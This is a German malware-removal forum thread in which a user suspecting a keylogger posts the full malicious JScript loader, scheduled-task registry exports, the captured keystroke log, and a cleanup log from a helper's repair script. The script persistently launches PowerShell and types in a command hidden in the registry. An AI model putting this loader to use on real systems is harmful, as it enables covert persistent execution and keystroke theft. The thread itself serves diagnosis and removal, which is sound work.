| |
| |||||||
Log-Analyse und Auswertung: Keylogger am Werk?Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML. |
 |
25.03.2024, 01:45
| #1 |
 |  Keylogger am Werk? Moin, Moin, nun muss ich leider auch dieses Board in Anspruch nehmen. Ich habe das Problem, dass ich mir einen Keylogger etc. eingefangen habe. Es hatte sich bemerkbar gemacht, indem mein Browserfenster in den Vollbildmodus wechselte (Habe das sonst nur im unterem Bildschirmbereich offen) und es versuchte "jemand" die Paypal-Seite aufzurufen. Das ist erst mal ok (Gerade weil ich kein PayPal habe  ).Hier mal meine Beobachtungen und Vermutungen in Stichworten:
Inhalt der Datei yRkawdXSgdbJmzp.js: Code:
ATTFilter //yRkawdXSgdbJmzp
var objShell = new ActiveXObject("WScript.Shell");
function IsProcessRunning(processName) {
var objWMIService = GetObject("winmgmts:\\\\.\\root\\cimv2");
var colProcesses = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" + processName + "'");
return colProcesses.Count > 0;
}
function RunPowerShellCommands() {
var windowsDir = objShell.ExpandEnvironmentStrings("%windir%");
objShell.Run(windowsDir + "\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", 2);
var colProcesses = GetObject("winmgmts:").InstancesOf("Win32_Process");
var enumerator = new Enumerator(colProcesses);
for (; !enumerator.atEnd(); enumerator.moveNext()) {
var objProcess = enumerator.item();
if (objProcess.Name.toLowerCase() === "powershell.exe") {
objShell.AppActivate(objProcess.ProcessId);
objShell.SendKeys(objShell.RegRead("HKEY_CURRENT_USER\\Software\\yRkawdXSgdbJmzp\\v"));
objShell.SendKeys("{ENTER}");
objShell.SendKeys("Stop-Process -Name conhost -Force");
objShell.SendKeys("{ENTER}");
WScript.Sleep(5000);
break;
}
}
}
for (var i = 0; i <= 10000; i++) {
if (!IsProcessRunning(objShell.RegRead("HKEY_CURRENT_USER\\Software\\yRkawdXSgdbJmzp\\i"))) {
RunPowerShellCommands();
}
WScript.Sleep(10000);
}
Ein Registry-Eintrag dazu findet sich hier: Code:
ATTFilter Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{97E873B8-E0BC-4E2C-A97B-2BFF2CD6D8E6}]
"Path"="\\yRkawdXSgdbJmzp"
"Hash"=hex:7b,1f,86,91,3e,8d,64,5d,08,d6,20,87,56,d1,64,27,4d,73,c8,62,65,5a,\
99,7d,f7,e8,a0,c8,34,c4,78,05
"Schema"=dword:00010002
"URI"="\\yRkawdXSgdbJmzp"
"Triggers"=hex:17,00,00,00,00,00,00,00,01,07,03,00,00,00,06,00,00,80,63,3b,59,\
6f,da,01,00,07,03,00,00,00,06,00,ff,ff,ff,ff,ff,ff,ff,ff,38,21,41,42,48,48,\
48,48,76,7d,16,a8,48,48,48,48,0e,00,00,00,48,48,48,48,41,00,75,00,74,00,68,\
00,6f,00,72,00,00,00,48,48,00,00,00,00,48,48,48,48,00,48,48,48,48,48,48,48,\
00,48,48,48,48,48,48,48,01,00,00,00,48,48,48,48,1c,00,00,00,48,48,48,48,01,\
05,00,00,00,00,00,05,15,00,00,00,5b,fd,fa,f6,ac,1a,e5,15,b1,e5,31,30,53,04,\
00,00,48,48,48,48,2c,00,00,00,48,48,48,48,54,00,48,00,4f,00,4d,00,41,00,53,\
00,2d,00,52,00,45,00,49,00,43,00,48,00,45,00,4c,00,5c,00,74,00,68,00,6f,00,\
6d,00,61,00,73,00,00,00,48,48,48,48,2c,00,00,00,48,48,48,48,58,02,00,00,10,\
0e,00,00,80,f4,03,00,ff,ff,ff,ff,07,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,48,48,48,48,dd,dd,00,00,00,00,00,\
00,01,07,03,00,00,00,06,00,00,80,63,3b,59,6f,da,01,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,3c,\
00,00,00,00,00,00,00,ff,ff,ff,ff,00,00,00,00,00,00,00,00,00,00,00,00,00,01,\
f8,9e,01,00,00,00,00,00,00,00,75,02,00,00,00,00,00,00,48,48,48,48
"Actions"=hex:03,00,0c,00,00,00,41,00,75,00,74,00,68,00,6f,00,72,00,66,66,00,\
00,00,00,ba,00,00,00,43,00,3a,00,5c,00,55,00,73,00,65,00,72,00,73,00,5c,00,\
54,00,68,00,6f,00,6d,00,61,00,73,00,2e,00,54,00,48,00,4f,00,4d,00,41,00,53,\
00,2d,00,52,00,45,00,49,00,43,00,48,00,45,00,4c,00,5c,00,41,00,70,00,70,00,\
44,00,61,00,74,00,61,00,5c,00,52,00,6f,00,61,00,6d,00,69,00,6e,00,67,00,5c,\
00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,5c,00,57,00,69,00,\
6e,00,64,00,6f,00,77,00,73,00,5c,00,54,00,65,00,6d,00,70,00,6c,00,61,00,74,\
00,65,00,73,00,5c,00,79,00,52,00,6b,00,61,00,77,00,64,00,58,00,53,00,67,00,\
64,00,62,00,4a,00,6d,00,7a,00,70,00,2e,00,6a,00,73,00,00,00,00,00,00,00,00,\
00,00,00
"DynamicInfo"=hex:03,00,00,00,47,59,25,20,37,7e,da,01,b6,57,26,15,48,7e,da,01,\
00,00,00,00,e0,10,07,80,45,bc,39,f8,45,7e,da,01
Code:
ATTFilter Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\yRkawdXSgdbJmzp]
"SD"=hex:01,00,04,80,88,00,00,00,98,00,00,00,00,00,00,00,14,00,00,00,02,00,74,\
00,04,00,00,00,00,10,18,00,9f,01,1f,00,01,02,00,00,00,00,00,05,20,00,00,00,\
20,02,00,00,00,10,14,00,9f,01,1f,00,01,01,00,00,00,00,00,05,12,00,00,00,00,\
10,18,00,ff,01,1f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,\
24,00,89,00,12,00,01,05,00,00,00,00,00,05,15,00,00,00,5b,fd,fa,f6,ac,1a,e5,\
15,b1,e5,31,30,53,04,00,00,d0,76,3e,0d,01,02,00,00,00,00,00,05,20,00,00,00,\
20,02,00,00,01,05,00,00,00,00,00,05,15,00,00,00,5b,fd,fa,f6,ac,1a,e5,15,b1,\
e5,31,30,01,02,00,00
"Id"="{97E873B8-E0BC-4E2C-A97B-2BFF2CD6D8E6}"
"Index"=dword:00000003
und die hxxp://5.189.183.113/Addition.txt Zu HiJackThis-Zeiten war es für mich einfacher die Logs zu sichten bzw mit Hilfe auszuwerten. Nun bin ich wirklich komplett auf Eure Hilfe angewiesen. F-Secure sagt keinen Mucks. Ach ja,- wie komme ich auf Keylogger.... Nun es wurde ein Registry-Key erstellt, wo offensichtlich alles abgelegt wurde: Code:
ATTFilter Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\3cec14c682a69cb8fafb5026acd55133]
"[kl]"=" 24.03.24 powershell Windows PowerShell eoteNc.lKc 24.03.24 TOTALCMD64 Total Commander (x64) 11.03 l[ENTER]regereged[Delete] 24.03.24 TOTALCMD64 Total Commander (x64) 11.03 [ENTER] 24.03.24 TOTALCMD64 Total Commander (x64) 11.03 .zaak[ENTER] 24.03.24 chrome \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window --win-session-start - Google Suche - Google Chrome [Back]\"[ENTER] 24.03.24 chrome MicrosoftEdgeAutoLaunch_22BF80BC2136A2C83F26CA891AE199D8 - Google Suche - Google Chrome [Back][ENTER] 24.03.24 explorer Opera ...[Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back]192.168.0.30[ENTER] 24.03.24 chrome B0A95C82BA6D3B5A9F4A - Google Suche - Google Chrome Changzih[ENTER] 24.03.24 chrome Changzhi - Google Suche - Google Chrome HKCU[ENTER] 24.03.24 TOTALCMD64 Total Commander (x64) 11.03 [Back][ENTER]hjt[ENTER][Back][ENTER] 24.03.25 chrome Neuer Tab - Google Chrome log auswerten[ENTER] 24.03.25 chrome www.hijackthis.de - Google Chrome [Back][Back][ENTER] 24.03.25 explorer hjt [Delete] 24.03.25 chrome Trojaner-Board - Neues Thema erstellen - Google Chrome Keylogger am Werk?Moin, Moin,[ENTER]nun muss ich leider auch mal wieder d[Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back]dieses Board in Anspruch nehmen. Ich habe das Problem, dass ich mir einen Keylogger etc. eingefangen habe. Es hatte sich bemerkbar gemacht, indem mein Bw[Back]rowserfenster in den Vollbildmodus wechselte (Habe das sonst nur im unterem Bildschirmbereich offen) und es versuchte sich jemand mir [Back][Back]t [Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back]\"jemand\" die Paypal-Seite aufzurufen. Das ist erst mal ok (Gerade weil ich kein PayPal habe :-) [Back][Back][Back][Back] ). Der Z[Back][Back][Back][Back][Back][Back][ENTER]Hier mal meine Beobachtungen und vermutungen in Stichworten:[ENTER]Es muss Scriptgesteuert gewesen sein, da dieser Vorgang auch OHNE Netzwerk weiter gingEr legte einige VB-Scripte und com.exe-Dateien in meinem AppData/Local abEs fanden sich verschiede Reg-Kay[Back][Back]es[Back]ys unter HKEY_CURRENT_USERSoftwareyRkawdb ....[Delete][Delete]Roaming[Back][ENTER]*Im Verzeichnis [Back]** befanden sich ebenfalls JavaScript-Dateien welche die gleiche Beh[Back]nahmung wie die Reg-Keys hatte ()[ENTER]Inhalt der Datei .js [Back]:[ENTER] 24.03.25 TOTALCMD64 [2] Total Commander (x64) 11.03 [Delete] 24.03.25 TOTALCMD64 [2] Total Commander (x64) 11.03 [ENTER] 24.03.25 chrome Trojaner-Board - Neues Thema erstellen - Google Chrome Hier nun die Logs:[Back].. FRST.txt[ENTER]und die Additional[Back][Back].txt:[ENTER]Zu -Zeiten war es für mich einfacher die Logs zu sichten bzw mit Hilfe auszuwerten. Nun bin ich wirklich komplett auf Eure Hilfe angewiesen. F-Secure sagt keinen Muks[Back][Back]cks [Back]. 24.03.25 TOTALCMD64 [2] Total Commander (x64) 11.03 [Delete] 24.03.25 TOTALCMD64 [2] Total Commander (x64) 11.03 [ENTER] 24.03.25 chrome Trojaner-Board - Neues Thema erstellen - Google Chrome Ein Registry-Eintrag dazu findet sich hier:[ENTER]und einer hier:[ENTER]"
Wie bekomme ich den Sch... weg ohne neu zu installieren? Der Aufwand wäre immens zumal ich nicht weis, wie das ganze ins System gelangt ist. Danke und Gruß aus Hamburg. |
|
25.03.2024, 09:01
| #2 |
| /// TB-Ausbilder   | Keylogger am Werk? Mein Name ist Matthias und ich werde dir bei der Analyse und Bereinigung deines Systems helfen. Ich analysiere dein System und melde mich später wieder. Die Logdateien von FRST oder anderen Tools kannst du zukünftig direkt hier als Antwort in Code-Tags reinposten, z. B. so: Code:
ATTFilter Hier ist die Logdatei
|
|
25.03.2024, 12:27
| #3 |
| /// TB-Ausbilder | Keylogger am Werk? Ich analysiere Logdateien jetzt schon seit über 12 Jahren, aber diese Malware habe ich noch nicht gesehen... es gibt immer was Neues.
__________________ Skript-basierte Schadsoftware (JS, BAT, VBS, PS, etc.) wie hier ist meist sehr intelligent gemacht, ziemlich "verwinkelt" alles... und schwer zu erkennen. Wir sollten sie aber entfernen können, insbesondere da du dich am Computer auskennst. Wir beginnen zuerst mit einer Reparatur mit FRST. Diese kann durchaus einige Minuten dauern. Damit entfernen wir alle aktiven Komponenten der Malware. Zudem lesen wir ein paar Ordner und Schlüssel aus, um evtl. weitere Komponenten der Malware aufzuspühren. Zudem setzen wir die Windows Firewall zurück und leeren die temporären Speicherbänke. Ebenso entfernen wir verwaiste Einträge sowie Dateien an ungewöhnlichen Pfaden. Weitere Schritte werden folgen. Schritt 1 WARNUNG AN ALLE MITLESER !!! Dieses FRST-Skript ist ausschließlich für diesen Nutzer gedacht und sollte niemals 1:1 für ein anderes System verwendet werden!
|
|
25.03.2024, 16:41
| #4 |
| | Keylogger am Werk? erst einmal danke für deine Unterstützung. Hier das Log: Code:
ATTFilter Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 25.03.2024
durchgeführt von thomas (25-03-2024 15:41:47) Run:1
Gestartet von D:\hjt
Geladene Profile: Thomas & thomas
Start-Modus: Normal
==============================================
fixlist Inhalt:
*****************
Start::
SystemRestore: On
CreateRestorePoint:
CloseProcesses:
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Keine Datei
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Keine Datei
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Keine Datei
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Keine Datei
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Keine Datei
ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Keine Datei
ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Keine Datei
ContextMenuHandlers6: [ContMenu] -> {FCF608CF-5716-47C3-A1A8-991D873AF72B} => -> Keine Datei
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKU\S-1-5-21-3460856420-2582145234-728948223-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-4143643995-367336108-808576433-1107\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
BHO: Kein Name -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> Keine Datei
BHO-x32: Kein Name -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> Keine Datei
Toolbar: HKLM - Kein Name - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - Keine Datei
Toolbar: HKLM-x32 - Kein Name - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - Keine Datei
HKU\S-1-5-21-4143643995-367336108-808576433-1107\...\StartupApproved\Run: => "OneDrive GsAofCNyJa"
HKU\S-1-5-21-4143643995-367336108-808576433-1107\...\StartupApproved\Run: => "OneDrive ShidVxuBhh"
HKU\S-1-5-21-4143643995-367336108-808576433-1107\...\StartupApproved\StartupFolder: => "AppData.exe"
C:\Users\AllUserName\AppData\Roaming\Deskt.exe
C:\Users\AllUserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Desktop.exe
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-4143643995-367336108-808576433-1107\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-4143643995-367336108-808576433-1107\...\Run: [] => [X]
HKU\S-1-5-21-4143643995-367336108-808576433-1107\...\Winlogon: [Shell] explorer.exe,C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs\AppData.exe, <==== ACHTUNG
File: C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs\AppData.exe
C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs
HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] ->
Task: {9FA8515B-F007-4624-90D9-859C02C34812} - System32\Tasks\Microsoft\Windows\GroupPolicy\{3E0A038B-D834-4930-9981-E89C9BFF83AA} => C:\WINDOWS\system32\gpupdate.exe [53248 2024-03-14] (Microsoft Windows -> Microsoft Corporation)
Task: {F9E3B3CF-1D15-41B5-8765-D0ADC55474D5} - System32\Tasks\Microsoft\Windows\GroupPolicy\{A7719E0F-10DB-4640-AD8C-490CC6AD5202} => C:\WINDOWS\system32\gpupdate.exe [53248 2024-03-14] (Microsoft Windows -> Microsoft Corporation)
StartupDir: %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs <==== ACHTUNG
GroupPolicy: Beschränkung ? <==== ACHTUNG
Policies: C:\ProgramData\NTUSER.pol: Beschränkung <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Edge: Beschränkung <==== ACHTUNG
Task: {E5CDE7D5-8E9C-4E6A-8F23-5180D9D79571} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe --automatic (Keine Datei)
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => %SystemRoot%\System32\MbaeParserTask.exe (Keine Datei)
Task: {5E0AD918-FE0B-47F9-BE79-CE17564845EC} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_AC => %systemroot%\system32\MusNotification.exe /RunOnAC RebootDialog (Keine Datei)
Task: {58D77E8D-A3B3-4C34-B5E7-D9737015349A} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery => %systemroot%\system32\MusNotification.exe /RunOnBattery RebootDialog (Keine Datei)
Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (Keine Datei)
CMD: type "C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\puTcVzRKiKPfhBC.js"
CMD: type "C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\yRkawdXSgdbJmzp.js"
Task: {62BCCF6C-F99B-4298-802F-F4E862B9E379} - System32\Tasks\puTcVzRKiKPfhBC => C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\puTcVzRKiKPfhBC.js [1424 2024-03-24] () [Datei ist nicht signiert] <==== ACHTUNG
Task: {97E873B8-E0BC-4E2C-A97B-2BFF2CD6D8E6} - System32\Tasks\yRkawdXSgdbJmzp => C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\yRkawdXSgdbJmzp.js [1424 2024-03-24] () [Datei ist nicht signiert] <==== ACHTUNG
File: C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\puTcVzRKiKPfhBC.js
C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\puTcVzRKiKPfhBC.js
File: C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\yRkawdXSgdbJmzp.js
C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\yRkawdXSgdbJmzp.js
Edge Notifications: Default -> hxxps://web.whatsapp.com
CHR Notifications: Default -> hxxps://app.sipgate.com; hxxps://calendar.google.com; hxxps://community.symcon.de; hxxps://forum-ukraine.de; hxxps://forum.fritzing.org; hxxps://kundenbereich.check24.de; hxxps://nas.domäne.com; hxxps://web.telegram.org; hxxps://www.facebook.com; hxxps://www.instagram.com; hxxps://www.lieferando.de; hxxps://www.romeo.com; hxxps://www.scenic-forum.de
FF user.js: detected! => C:\Users\user.domäne\AppData\Roaming\Mozilla\Firefox\Profiles\5pbxmky2.default\user.js [2023-06-10]
FF user.js: detected! => C:\Users\user.domäne\AppData\Roaming\Mozilla\Firefox\Profiles\37niltkt.default-release\user.js [2023-06-10]
FF HKLM\...\Firefox\Extensions: [bdwtwe@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender Security\bdwteff.xpi => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [bdwtwe@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender Security\bdwteff.xpi => nicht gefunden
S3 semav6msr64; \??\C:\Windows\system32\drivers\semav6msr64.sys [X]
2021-05-04 04:00 - 2021-05-09 16:01 - 000000128 ____H () C:\Users\user.domäne\AppData\Roaming\ecf00c38dc807e105d881c433a6b455dd2c606b6
2024-03-24 23:08 - 2022-11-04 06:02 - 000069632 _____ (Microsoft Corporation) C:\Users\user.domäne\AppData\Roaming\MSBuild.exe
2024-03-24 23:09 - 2022-11-04 06:02 - 000032768 _____ (Microsoft Corporation) C:\Users\user.domäne\AppData\Roaming\RegSvcs.exe
Unlock: C:\Users\user.domäne\AppData\Roaming\Microsoft\Teams
2023-03-11 19:31 - 2023-03-11 19:31 - 000000069 _____ () C:\Program Files (x86)\dialogysclip.bat
2023-03-11 19:29 - 2023-03-11 19:55 - 000001785 _____ () C:\Program Files (x86)\DialogysUninstWPS.bat
2022-02-26 14:35 - 2022-02-26 14:35 - 000000030 _____ () C:\Program Files (x86)\Exiferupdate.ini
2023-03-11 19:29 - 2023-03-11 19:29 - 000000844 _____ () C:\Program Files (x86)\INSTALL.LOG
2023-10-07 17:08 - 2023-10-07 17:08 - 000001082 _____ () C:\Program Files (x86)\MacroRecorder.lnk
2023-03-11 19:29 - 2017-11-08 16:09 - 000176040 _____ () C:\Program Files (x86)\UninstScript.EXE
2021-05-04 04:00 - 2021-05-09 16:01 - 000000128 ____H () C:\Users\user.domäne\AppData\Roaming\ecf00c38dc807e105d881c433a6b455dd2c606b6
2024-03-24 23:08 - 2022-11-04 06:02 - 000069632 _____ (Microsoft Corporation) C:\Users\user.domäne\AppData\Roaming\MSBuild.exe
2024-03-24 23:09 - 2022-11-04 06:02 - 000032768 _____ (Microsoft Corporation) C:\Users\user.domäne\AppData\Roaming\RegSvcs.exe
2024-03-11 15:12 - 2024-03-11 15:12 - 000174062 _____ () C:\Users\user.domäne\AppData\Roaming\rvhost.vbe.zaak
2021-02-03 04:26 - 2024-03-19 21:50 - 000000128 _____ () C:\Users\user.domäne\AppData\Roaming\winscp.rnd
2022-09-25 10:16 - 2022-09-25 10:35 - 001163406 _____ () C:\Users\user.domäne\AppData\Roaming\WrapAnGo_Install.log
2021-12-19 16:02 - 2021-12-19 16:02 - 000001456 _____ () C:\Users\user.domäne\AppData\Local\Adobe Für Web speichern 13.0 Prefs
2021-02-03 06:28 - 2021-10-29 18:02 - 000018432 _____ () C:\Users\user.domäne\AppData\Local\https_www.amazon.de_0.localstorage
2022-08-21 05:36 - 2022-08-21 05:36 - 000000000 _____ () C:\Users\user.domäne\AppData\Local\{9F850872-AAD4-4482-A31A-2969AE3AEF22}
CMD: reg query "HKCU\Software\yRkawdXSgdbJmzp" /S
DeleteKey: HKCU\Software\yRkawdXSgdbJmzp
CMD: reg query "HKCU\Software\3cec14c682a69cb8fafb5026acd55133" /S
DeleteKey: HKCU\Software\3cec14c682a69cb8fafb5026acd55133
CMD: reg query "HKCU\Software"
CMD: reg query "HKLM\Software" /reg:32
CMD: reg query "HKLM\Software" /reg:64
CMD: dir /A "c:\users\public"
CMD: dir /A "C:\Users\user.domäne"
CMD: cscript /nologo %systemroot%\System32\slmgr.vbs /dlv
CMD: netsh winsock reset
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh winhttp reset proxy
CMD: Bitsadmin /Reset /Allusers
CMD: Winmgmt /salvagerepository
CMD: Winmgmt /verifyrepository
CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R
CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R
CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R
CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R
Hosts:
RemoveProxy:
EmptyTemp:
End::
*****************
SystemRestore: On => abgeschlossen
Wiederherstellungspunkt wurde erfolgreich erstellt.
Prozesse erfolgreich geschlossen.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1 => erfolgreich entfernt
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2 => erfolgreich entfernt
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3 => erfolgreich entfernt
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4 => erfolgreich entfernt
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5 => erfolgreich entfernt
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive6 => erfolgreich entfernt
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive7 => erfolgreich entfernt
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1 => erfolgreich entfernt
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2 => erfolgreich entfernt
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3 => erfolgreich entfernt
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4 => erfolgreich entfernt
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5 => erfolgreich entfernt
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive6 => erfolgreich entfernt
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive7 => erfolgreich entfernt
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\ContMenu => erfolgreich entfernt
HKLM\Software\\Microsoft\Internet Explorer\Main\\"Start Page"="hxxp://go.microsoft.com/fwlink/?LinkId=69157" => Wert erfolgreich wiederhergestellt
HKU\S-1-5-21-3460856420-2582145234-728948223-1001\Software\Microsoft\Internet Explorer\Main\\"Start Page"="hxxp://go.microsoft.com/fwlink/?LinkId=69157" => Wert erfolgreich wiederhergestellt
HKU\S-1-5-21-4143643995-367336108-808576433-1107\Software\Microsoft\Internet Explorer\Main\\"Start Page"="hxxp://go.microsoft.com/fwlink/?LinkId=69157" => Wert erfolgreich wiederhergestellt
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1DAC0C53-7D23-4AB3-856A-B04D98CD982A} => erfolgreich entfernt
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1DAC0C53-7D23-4AB3-856A-B04D98CD982A} => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{1DAC0C53-7D23-4AB3-856A-B04D98CD982A}" => erfolgreich entfernt
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{1DAC0C53-7D23-4AB3-856A-B04D98CD982A}" => erfolgreich entfernt
"HKU\S-1-5-21-4143643995-367336108-808576433-1107\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\OneDrive GsAofCNyJa" => erfolgreich entfernt
"HKU\S-1-5-21-4143643995-367336108-808576433-1107\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\OneDrive GsAofCNyJa" => nicht gefunden
"HKU\S-1-5-21-4143643995-367336108-808576433-1107\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\OneDrive ShidVxuBhh" => erfolgreich entfernt
"HKU\S-1-5-21-4143643995-367336108-808576433-1107\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\OneDrive ShidVxuBhh" => nicht gefunden
"C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs\AppData.exe" => nicht gefunden
"HKU\S-1-5-21-4143643995-367336108-808576433-1107\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder\\AppData.exe" => erfolgreich entfernt
"C:\Users\ProgramData\AppData\Roaming\Deskt.exe" => nicht gefunden
"C:\Users\Default\AppData\Roaming\Deskt.exe" => nicht gefunden
